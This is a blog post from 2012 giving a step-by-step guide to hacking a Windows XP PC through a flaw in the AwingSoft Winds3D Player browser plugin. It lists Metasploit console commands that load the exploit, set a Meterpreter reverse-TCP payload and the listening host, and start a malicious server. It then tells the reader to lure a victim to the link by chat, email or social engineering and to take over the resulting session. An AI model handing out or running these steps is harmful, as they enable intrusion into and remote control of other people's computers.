Warung Online
Headlines News :
mas template
Home » , » Hack Windows PC using Awing Soft Winds3D Player 3.5 SceneURL Download and Execute

Hack Windows PC using Awing Soft Winds3D Player 3.5 SceneURL Download and Execute

Written By Trik Cari Duit on Minggu, 27 Mei 2012 | 11.25

This module exploits untrusted program execution vulnerability within the Winds3D Player from AwingSoft. The Winds3D Player is a browser Plugin for IE (ActiveX), Opera (DLL) and Firefox (XPI). By setting the 'SceneURL' parameter to the URL to an executable, an attacker can execute arbitrary code. Testing was conducted using Plugin version 3.5.0.9 for Firefox 3.5 and IE 8 on Windows XP SP3.

Exploit Targets
Firefox 3.5 on XP SP2
Internet Explorer 8 on XP SP2

Requirement
Attacker: Backtrack 5
Victim PC: Windows XP

Open backtrack terminal type msfconsole


Now type use exploit/windows/browser/awingsoft_winds3d_sceneurl

Msf exploit (awingsoft_winds3d_sceneurl)>set payload windows/meterpreter/reverse_tcp
Msf exploit (awingsoft_winds3d_sceneurl)>set lhost 192.168.1.2 (IP of Local Host)
Msf exploit (awingsoft_winds3d_sceneurl)>set srvhost 192.168.1.2 (This must be an address on the local machine)
Msf exploit (awingsoft_winds3d_sceneurl)>set uripath awingsoft (The Url to use for this exploit)
Msf exploit (awingsoft_winds3d_sceneurl)>exploit


Now an URL you should give to your victim http://192.168.1.2:8080/awingsoft


Send the link of the server to the victim via chat or email or any social engineering technique.

Now you have access to the victims PC. Use “Sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID“ 

Share this article :

0 komentar:

Speak up your mind

Tell us what you're thinking... !

Bisnis Hot
Bisnis Hot
 


Copyright © . Tips N Trik - All Rights Reserved
Proudly powered by Blogger